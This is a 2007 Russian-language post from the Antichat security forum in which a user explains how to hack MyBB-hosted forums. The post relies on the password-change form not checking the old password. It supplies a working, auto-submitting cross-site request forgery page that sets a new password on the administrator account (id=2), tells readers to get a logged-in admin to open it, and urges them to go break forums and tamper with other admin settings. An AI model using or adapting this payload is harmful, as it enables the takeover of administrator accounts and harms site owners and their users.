HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу ОПИСАНИЕ ВЗЛОМА Mybb ФОРУМОВ
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

ОПИСАНИЕ ВЗЛОМА Mybb ФОРУМОВ
  #1  
Старый 06.01.2007, 01:14
consul
Новичок
Регистрация: 05.01.2007
Сообщений: 8
Провел на форуме:
17445

Репутация: 14
По умолчанию ОПИСАНИЕ ВЗЛОМА Mybb ФОРУМОВ
Почитал форум и обнаружил толпу людей, интересующихся вопросом как взломать форум mybb. Ниже я опишу пару абсолютно новых найденных мной уязвимостей, действующих на 1bb, 2bb, 3bb, 4bb и 5bb. На форумы типа http://"называние форума".mybb.ru/ также можно взламывать прочитав эту статейку. Уязвимости возможно действуют так же и в остальных версиях mybb и punbb потому что они все однотипны.

1) Если тебе необходимо взломать форум, не торопсись, сначала всё обдумай, осмотрись. Для начала ты должен зарегестрироваться, найти администратора форума. Теперь, можно приступать к главной цели - взлому.

2) Формы. Дело в том что для каждого ресурса где есть какие-либо формы(поля) куда можно вбивать запросы, есть возможность сделать лже-форму, с другими данными именами и атрибутами, или же просто скопировать оригинал.

3) Чем тебе помогут эти самые формы: В форумах mybb при изменении пароля через профиль юзевера(админа) нет проверки текущего(старого) пароля. Это означает, что ты можешь сделать лже-форму и вбить в неё новые значения переменных, в данном случае это req_new_password1 и req_new_password2. Первая просит ввести новый пароль, а вторая требует подтвердить его. Следовательно, создаём страничку с содержанием следущего кода:

Код:
<script lang=javascript>
  function hackedforum () {
document.hacked.submit();
  }
</script>
<body onload="hackedforum()">
<form method="post" name="hacked" action="http://ЦЕЛЬ(АДРЕС ФОРУМА)/profile.php?action=change_pass&amp;id=2">
<input type="hidden" name="form_sent" value="1">
<input type="hidden" name="req_new_password1" value="your_password">
<input type="hidden" name="req_new_password2" value="your_password">
</form>
4) Эту страничку ты должен впарить администратору форума, причём в тот момент, когда он авторизован. Теперь вооружившись уязвимостью и своей головой, иди и ломай форумы mybb которые тебе нужны. Да! Не стойте на месте, думайте как ещё можно использовать эту уязвимость, благо настройки администратора не оканчиваются только на смене пароля, можете создавать другие лже-формы. Свой форум mybb можно зарегестрировать за одну минуту по адресу http://mybb.ru/new.php на нём и тестируйте, попробуйте изменить настройки форума, права групп и т.д, вообщем перспектива огромная ;-)

---------------------------------------------------------
Специально для сайта Античат, ваш Consul.
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Подскажите xss для форумов mybb IBn Уязвимости CMS / форумов 2 20.11.2006 08:31
Внимание! Найдена уязвимость форумов на offtop.ru! Black_Kardinal Уязвимости CMS / форумов 14 09.01.2006 13:58
Заключение MyBB KEZ Уязвимости 4 31.03.2005 12:51



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ